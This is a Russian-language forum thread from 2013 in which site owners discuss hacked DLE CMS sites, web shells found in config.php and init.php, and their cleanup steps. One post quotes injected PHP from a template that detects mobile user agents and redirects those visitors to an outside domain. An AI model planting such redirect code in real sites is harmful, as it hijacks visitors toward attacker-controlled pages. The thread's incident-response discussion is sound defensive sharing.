Вирус на сайте cms dle

Видимо так.

Удалил все папки кроме uploads и проинсталил dle 9.7 + новый баг фикс.

Завтра посмотрим будет ли г..но код.

---------- Добавлено 07.01.2013 в 19:08 ----------

фаил config.php был изменен в 2011 году, а внутри был код.

О вам льет шелл тот же человек что и мне)))

гляньте еще тут /engine/init.php где то в середине у меня туда же залил.

Щас вот поставил заплатки с сайта Dle news, сменил пароли. Вот сижу жду пока обьявится. Еще прогоните shelldetect мне посоветовали, через него нашел где еще эта зараза.

я обновился как тут описано

У меня тоже ДЛЕ ломанули, всунули похожую заразу (отлавливала заходы с мобильных устройств).

Только, вдруг кому поможет, всунули в main.tpl шаблона. JS скрипт.

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {

header('Location: http://statuses.ws/');

Такая же беда сегодня приключилась...

У меня тоже такая проблема.

Ребята кто то смог источник найти этого г**но ?

Источник, видимо, 0-day уязвимость CMS DLE, которую кто-то поставил на конвейер.

Следите за обновлениями и, если есть возможность, устанавливайте как минимум обновления которые касаются безопасности.

я так понимаю у всех нулл стоит... От мид-тима?

Обнуленная версия роли не играет, если конечно брали ее не в сомнительных местах.

1. Проскандировал shelldetect.php (посоветовали в другой теме)

2. Вычистил эту дрянь.

3. Расставил права на папки как положено.

4. Сменил паролли от бд, админки, хостинга, фтп (вообщем все.). Так как открывал этот шелл и там полный доступ к бд и ко всем файлам.